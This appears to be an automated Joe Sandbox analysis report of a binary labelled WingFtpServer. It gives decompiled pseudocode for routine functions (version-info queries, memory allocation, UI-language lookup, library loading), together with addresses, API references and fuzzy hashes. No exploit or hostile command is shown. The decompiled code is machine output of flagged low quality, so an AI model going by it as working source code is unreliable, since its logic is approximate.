                                                                                                                                                                                                  0x03aa9692
                                                                                                                                                                                                  0x03aa9693
                                                                                                                                                                                                  0x03aa9698
                                                                                                                                                                                                  0x03aa969a
                                                                                                                                                                                                  0x03aa969a
                                                                                                                                                                                                  0x03aa96a4
                                                                                                                                                                                                  0x03aa96a6
                                                                                                                                                                                                  0x03aa96ad
                                                                                                                                                                                                  0x03aa96ad
                                                                                                                                                                                                  0x03aa96b7
                                                                                                                                                                                                  0x03aa994c
                                                                                                                                                                                                  0x03aa994d
                                                                                                                                                                                                  0x03aa994e
                                                                                                                                                                                                  0x03aa9960
                                                                                                                                                                                                  0x03aa9962
                                                                                                                                                                                                  0x03aa9967
                                                                                                                                                                                                  0x03aa996e
                                                                                                                                                                                                  0x03aa996e
                                                                                                                                                                                                  0x03aa997a
                                                                                                                                                                                                  0x03aa998e
                                                                                                                                                                                                  0x03aa9998
                                                                                                                                                                                                  0x03aa9998
                                                                                                                                                                                                  0x03aa99a1
                                                                                                                                                                                                  0x03aa99c5
                                                                                                                                                                                                  0x03aa99c9
                                                                                                                                                                                                  0x03aa99d2
                                                                                                                                                                                                  0x03aa99d2
                                                                                                                                                                                                  0x03aa99d9
                                                                                                                                                                                                  0x03aa99f8
                                                                                                                                                                                                  0x03aa99f8
                                                                                                                                                                                                  0x03aa9a01
                                                                                                                                                                                                  0x03aa9a08
                                                                                                                                                                                                  0x03aa9a0d
                                                                                                                                                                                                  0x03aa9a0f
                                                                                                                                                                                                  0x03aa9a14
                                                                                                                                                                                                  0x03aa9a17
                                                                                                                                                                                                  0x03aa9a1d
                                                                                                                                                                                                  0x03aa9a24
                                                                                                                                                                                                  0x03aa9a24
                                                                                                                                                                                                  0x03aa9a1d
                                                                                                                                                                                                  0x03aa9a0d
                                                                                                                                                                                                  0x03aa9a2b
                                                                                                                                                                                                  0x03aa9a34
                                                                                                                                                                                                  0x03aa9a36
                                                                                                                                                                                                  0x03aa9a36
                                                                                                                                                                                                  0x03aa9a3d
                                                                                                                                                                                                  0x03aa9a41
                                                                                                                                                                                                  0x03aa9a41
                                                                                                                                                                                                  0x03aa9a49
                                                                                                                                                                                                  0x03aa9a52
                                                                                                                                                                                                  0x03aa9a54
                                                                                                                                                                                                  0x03aa9a54
                                                                                                                                                                                                  0x03aa9a5d
                                                                                                                                                                                                  0x03aa9a5d
                                                                                                                                                                                                  0x03aa9a6f
                                                                                                                                                                                                  0x03aa9a6f
                                                                                                                                                                                                  0x03aa9a71
                                                                                                                                                                                                  0x03aa9a72
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa99db
                                                                                                                                                                                                  0x03aa99db
                                                                                                                                                                                                  0x03aa99e0
                                                                                                                                                                                                  0x03aa99e4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa99e6
                                                                                                                                                                                                  0x03aa99e6
                                                                                                                                                                                                  0x03aa99e8
                                                                                                                                                                                                  0x03aa99ed
                                                                                                                                                                                                  0x03aa99f2
                                                                                                                                                                                                  0x03aa99f4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa99e6
                                                                                                                                                                                                  0x03aa99ac
                                                                                                                                                                                                  0x03aa99ac
                                                                                                                                                                                                  0x03aa99ac
                                                                                                                                                                                                  0x03aa99b5
                                                                                                                                                                                                  0x03aa99ba
                                                                                                                                                                                                  0x03aa99bc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa99c5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa99c5
                                                                                                                                                                                                  0x03aa96bd
                                                                                                                                                                                                  0x03aa96bd
                                                                                                                                                                                                  0x03aa96c2
                                                                                                                                                                                                  0x03aa96c2

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 03AA9637
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                                                                                  • Opcode ID: b4d13bab379a346c47992c00d8e4d65a572822441b0ca012b543dcbbd70bbd95
                                                                                                                                                                                                  • Instruction ID: f3bb5e8e17b3935228aa9282ba05eabe7b798436aab338ad68b1e64aa46bc6c7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4d13bab379a346c47992c00d8e4d65a572822441b0ca012b543dcbbd70bbd95
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7151E37A600B489FDB20EF6CD68476BBBE4AF49314F1844AFD8498B351E734C885CB16
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC7D9C Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                                                  			E03AC7D9C(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x3ac7e9c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E03AAA044( &_v8, __eax);
				E03AAA1A4( &_v8);
				_t33 = GetFileVersionInfoSizeW(E03AAA8E4(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x3ac7ea3);
					return E03AA9C1C( &_v8);
				} else {
					_v20 = E03AA6E90(_t64);
					_push(_t81);
					_push(0x3ac7e7f);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E03AAA8E4(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x3ac7eb0,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x3ac7e86);
					return E03AA6EAC(_v20);
				}
			}



















                                                                                                                                                                                                  0x03ac7d9d
                                                                                                                                                                                                  0x03ac7d9f
                                                                                                                                                                                                  0x03ac7da7
                                                                                                                                                                                                  0x03ac7daa
                                                                                                                                                                                                  0x03ac7dac
                                                                                                                                                                                                  0x03ac7db2
                                                                                                                                                                                                  0x03ac7db3
                                                                                                                                                                                                  0x03ac7db8
                                                                                                                                                                                                  0x03ac7dbb
                                                                                                                                                                                                  0x03ac7dbe
                                                                                                                                                                                                  0x03ac7dc7
                                                                                                                                                                                                  0x03ac7dcf
                                                                                                                                                                                                  0x03ac7de1
                                                                                                                                                                                                  0x03ac7de6
                                                                                                                                                                                                  0x03ac7dea
                                                                                                                                                                                                  0x03ac7e88
                                                                                                                                                                                                  0x03ac7e8b
                                                                                                                                                                                                  0x03ac7e8e
                                                                                                                                                                                                  0x03ac7e9b
                                                                                                                                                                                                  0x03ac7df0
                                                                                                                                                                                                  0x03ac7df7
                                                                                                                                                                                                  0x03ac7dfc
                                                                                                                                                                                                  0x03ac7dfd
                                                                                                                                                                                                  0x03ac7e02
                                                                                                                                                                                                  0x03ac7e05
                                                                                                                                                                                                  0x03ac7e1a
                                                                                                                                                                                                  0x03ac7e21
                                                                                                                                                                                                  0x03ac7e49
                                                                                                                                                                                                  0x03ac7e52
                                                                                                                                                                                                  0x03ac7e63
                                                                                                                                                                                                  0x03ac7e65
                                                                                                                                                                                                  0x03ac7e65
                                                                                                                                                                                                  0x03ac7e6b
                                                                                                                                                                                                  0x03ac7e6e
                                                                                                                                                                                                  0x03ac7e71
                                                                                                                                                                                                  0x03ac7e7e
                                                                                                                                                                                                  0x03ac7e7e

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,03AC7E9C), ref: 03AC7DE1
                                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,03AC7E7F,?,00000000,?,00000000,03AC7E9C), ref: 03AC7E1A
                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,03AC7EB0,?,?,00000000,?,00000000,?,00000000,03AC7E7F,?,00000000,?,00000000,03AC7E9C), ref: 03AC7E34
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2179348866-0
                                                                                                                                                                                                  • Opcode ID: 0ed7027c4403011b06c70fbbc58f47cb497aaca6e1c09166e288cf171865038c
                                                                                                                                                                                                  • Instruction ID: 119067978be39c2db42b3f5c23c594d3c24b3562c48ea60010ea8494f6d34643
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ed7027c4403011b06c70fbbc58f47cb497aaca6e1c09166e288cf171865038c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7312B76A10749AFDB01DFADC981DAEB7F8EB48600B5148BAA414E7311DB35ED00CB60
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA6514 Relevance: 3.8, APIs: 3, Instructions: 30sleepmemoryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 133 3aa6514-3aa651b 134 3aa655c-3aa6563 133->134 135 3aa651d 133->135 137 3aa657d-3aa6587 134->137 138 3aa6565-3aa6578 VirtualAlloc 134->138 136 3aa6549-3aa655a 135->136 136->134 139 3aa651f-3aa6526 136->139 138->137 139->136 140 3aa6528-3aa6540 Sleep 139->140 140->134 141 3aa6542-3aa6544 Sleep 140->141 141->136
                                                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                                                  			E03AA6514() {
				signed int _t3;

				if( *0x3bd305d != 0) {
					while(1) {
						_t3 = 0;
						asm("lock cmpxchg [0x3bd5b94], dl");
						if(0 == 0) {
							goto L6;
						}
						if( *0x3bd398d != 0) {
							continue;
						} else {
							Sleep(0);
							_t3 = 0;
							asm("lock cmpxchg [0x3bd5b94], dl");
							if(0 != 0) {
								Sleep(0xa);
								continue;
							}
						}
						goto L6;
					}
				}
				L6:
				if( *0x3bd5b90 == 0) {
					_t3 = VirtualAlloc(0, 0x10000, 0x1000, 4); // executed
					 *0x3bd5b90 = _t3;
				}
				return _t3 & 0xffffff00 |  *0x3bd5b90 != 0x00000000;
			}




                                                                                                                                                                                                  0x03aa651b
                                                                                                                                                                                                  0x03aa6549
                                                                                                                                                                                                  0x03aa654e
                                                                                                                                                                                                  0x03aa6550
                                                                                                                                                                                                  0x03aa655a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6526
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6528
                                                                                                                                                                                                  0x03aa652a
                                                                                                                                                                                                  0x03aa6534
                                                                                                                                                                                                  0x03aa6536
                                                                                                                                                                                                  0x03aa6540
                                                                                                                                                                                                  0x03aa6544
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6544
                                                                                                                                                                                                  0x03aa6540
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa6526
                                                                                                                                                                                                  0x03aa6549
                                                                                                                                                                                                  0x03aa655c
                                                                                                                                                                                                  0x03aa6563
                                                                                                                                                                                                  0x03aa6573
                                                                                                                                                                                                  0x03aa6578
                                                                                                                                                                                                  0x03aa6578
                                                                                                                                                                                                  0x03aa6587

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,03AA65DE,?,?,?,03AA6671), ref: 03AA652A
                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,03AA65DE,?,?,?,03AA6671), ref: 03AA6544
                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,03AA65DE,?,?,?,03AA6671), ref: 03AA6573
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$AllocVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3510833457-0
                                                                                                                                                                                                  • Opcode ID: 975abc3a8ec32dc9a206dcaf344c104d33031fe45f5930215761ac937c5db1d0
                                                                                                                                                                                                  • Instruction ID: 66c7005f2c548cd42c61fe4cee6a2a9b86fe364cc2a78c17e04cd0929c1d3e6a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 975abc3a8ec32dc9a206dcaf344c104d33031fe45f5930215761ac937c5db1d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91F0E96A54778114FB22FB28AB2A7821B40130334DF4C409F91891F5DDE7F60098CE42
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AAD650 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                  			E03AAD650(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E03AA9D00(_v8);
				E03AA9D00(_v12);
				_push(_t84);
				_push(0x3aad767);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E03AA9C1C(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E03AAD76E);
					return E03AA9C7C( &_v28, 6);
				} else {
					E03AAA044( &_v20, _v12);
					_t41 = _v12;
					if(_t41 != 0) {
						_t41 =  *(_t41 - 4);
					}
					_t60 = _t41;
					if(_t60 < 1) {
						L7:
						_t43 = E03AAD374(_v8, _t60, _t61,  &_v16, _t81); // executed
						if(_v16 == 0) {
							L03AA51BC();
							E03AACD24(_t43, _t60,  &_v24, _t79, _t81);
							_t46 = E03AAD4A0(_v20, _t60, _t81, _v24, _t79, _t81); // executed
							__eflags =  *_t81;
							if( *_t81 == 0) {
								__eflags =  *0x3bd5c10;
								if( *0x3bd5c10 == 0) {
									L03AA51C4();
									E03AACD24(_t46, _t60,  &_v28, _t79, _t81);
									E03AAD4A0(_v20, _t60, _t81, _v28, _t79, _t81);
								}
							}
							__eflags =  *_t81;
							if(__eflags == 0) {
								E03AAD584(_v20, _t60, _t81, __eflags); // executed
							}
						} else {
							E03AAD4A0(_v20, _t60, _t81, _v16, _t79, _t81);
						}
						goto L14;
					}
					while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
						_t60 = _t60 - 1;
						__eflags = _t60;
						if(_t60 != 0) {
							continue;
						}
						goto L7;
					}
					_t61 = _t60;
					E03AAACBC(_v12, _t60, 1,  &_v20);
					goto L7;
				}
			}

















                                                                                                                                                                                                  0x03aad650
                                                                                                                                                                                                  0x03aad650
                                                                                                                                                                                                  0x03aad653
                                                                                                                                                                                                  0x03aad655
                                                                                                                                                                                                  0x03aad657
                                                                                                                                                                                                  0x03aad659
                                                                                                                                                                                                  0x03aad65b
                                                                                                                                                                                                  0x03aad65d
                                                                                                                                                                                                  0x03aad65f
                                                                                                                                                                                                  0x03aad660
                                                                                                                                                                                                  0x03aad661
                                                                                                                                                                                                  0x03aad663
                                                                                                                                                                                                  0x03aad666
                                                                                                                                                                                                  0x03aad66c
                                                                                                                                                                                                  0x03aad674
                                                                                                                                                                                                  0x03aad67b
                                                                                                                                                                                                  0x03aad67c
                                                                                                                                                                                                  0x03aad681
                                                                                                                                                                                                  0x03aad684
                                                                                                                                                                                                  0x03aad689
                                                                                                                                                                                                  0x03aad692
                                                                                                                                                                                                  0x03aad74c
                                                                                                                                                                                                  0x03aad74e
                                                                                                                                                                                                  0x03aad751
                                                                                                                                                                                                  0x03aad754
                                                                                                                                                                                                  0x03aad766
                                                                                                                                                                                                  0x03aad698
                                                                                                                                                                                                  0x03aad69e
                                                                                                                                                                                                  0x03aad6a3
                                                                                                                                                                                                  0x03aad6a8
                                                                                                                                                                                                  0x03aad6ad
                                                                                                                                                                                                  0x03aad6ad
                                                                                                                                                                                                  0x03aad6af
                                                                                                                                                                                                  0x03aad6b4
                                                                                                                                                                                                  0x03aad6db
                                                                                                                                                                                                  0x03aad6e1
                                                                                                                                                                                                  0x03aad6ea
                                                                                                                                                                                                  0x03aad6fb
                                                                                                                                                                                                  0x03aad703
                                                                                                                                                                                                  0x03aad710
                                                                                                                                                                                                  0x03aad715
                                                                                                                                                                                                  0x03aad718
                                                                                                                                                                                                  0x03aad71a
                                                                                                                                                                                                  0x03aad721
                                                                                                                                                                                                  0x03aad723
                                                                                                                                                                                                  0x03aad72b
                                                                                                                                                                                                  0x03aad738
                                                                                                                                                                                                  0x03aad738
                                                                                                                                                                                                  0x03aad721
                                                                                                                                                                                                  0x03aad73d
                                                                                                                                                                                                  0x03aad740
                                                                                                                                                                                                  0x03aad747
                                                                                                                                                                                                  0x03aad747
                                                                                                                                                                                                  0x03aad6ec
                                                                                                                                                                                                  0x03aad6f4
                                                                                                                                                                                                  0x03aad6f4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad6ea
                                                                                                                                                                                                  0x03aad6b6
                                                                                                                                                                                                  0x03aad6d6
                                                                                                                                                                                                  0x03aad6d7
                                                                                                                                                                                                  0x03aad6d9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad6d9
                                                                                                                                                                                                  0x03aad6c5
                                                                                                                                                                                                  0x03aad6cf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aad6cf

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNEL32(00000000,03AAD767,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,03AAD7EE,00000000,?,00000105), ref: 03AAD6FB
                                                                                                                                                                                                  • GetSystemDefaultUILanguage.KERNEL32(00000000,03AAD767,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,03AAD7EE,00000000,?,00000105), ref: 03AAD723
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DefaultLanguage$SystemUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 384301227-0
                                                                                                                                                                                                  • Opcode ID: bbb36e9397eb8b243b098a6ce172c580dc2bb88220a4554e1c3eafe933d91cc6
                                                                                                                                                                                                  • Instruction ID: 710c84fe2e0000e43eeadf1234cbd371dde80920b2b0257493908bc15c22aabf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbb36e9397eb8b243b098a6ce172c580dc2bb88220a4554e1c3eafe933d91cc6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33315036A10A099FDB14FB9CCA90AAEB7F5EF49204F50456BD480AB750DB74AD80CB50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AAD774 Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                  			E03AAD774(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x3aad82e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E03AAA948( &_v536, _t49);
				_push(_v536);
				E03AAA99C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E03AAD650(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E03AAA8E4(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E03AAD835);
				E03AA9C7C( &_v540, 2);
				return E03AA9C1C( &_v8);
			}











                                                                                                                                                                                                  0x03aad781
                                                                                                                                                                                                  0x03aad787
                                                                                                                                                                                                  0x03aad78d
                                                                                                                                                                                                  0x03aad790
                                                                                                                                                                                                  0x03aad794
                                                                                                                                                                                                  0x03aad795
                                                                                                                                                                                                  0x03aad79a
                                                                                                                                                                                                  0x03aad79d
                                                                                                                                                                                                  0x03aad7b0
                                                                                                                                                                                                  0x03aad7bd
                                                                                                                                                                                                  0x03aad7c8
                                                                                                                                                                                                  0x03aad7da
                                                                                                                                                                                                  0x03aad7e8
                                                                                                                                                                                                  0x03aad7e9
                                                                                                                                                                                                  0x03aad7f2
                                                                                                                                                                                                  0x03aad801
                                                                                                                                                                                                  0x03aad806
                                                                                                                                                                                                  0x03aad80a
                                                                                                                                                                                                  0x03aad80d
                                                                                                                                                                                                  0x03aad810
                                                                                                                                                                                                  0x03aad820
                                                                                                                                                                                                  0x03aad82d

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,03AAD82E,?,03AA0000,03BCEC1C), ref: 03AAD7B0
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,03AAD82E,?,03AA0000,03BCEC1C), ref: 03AAD801
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
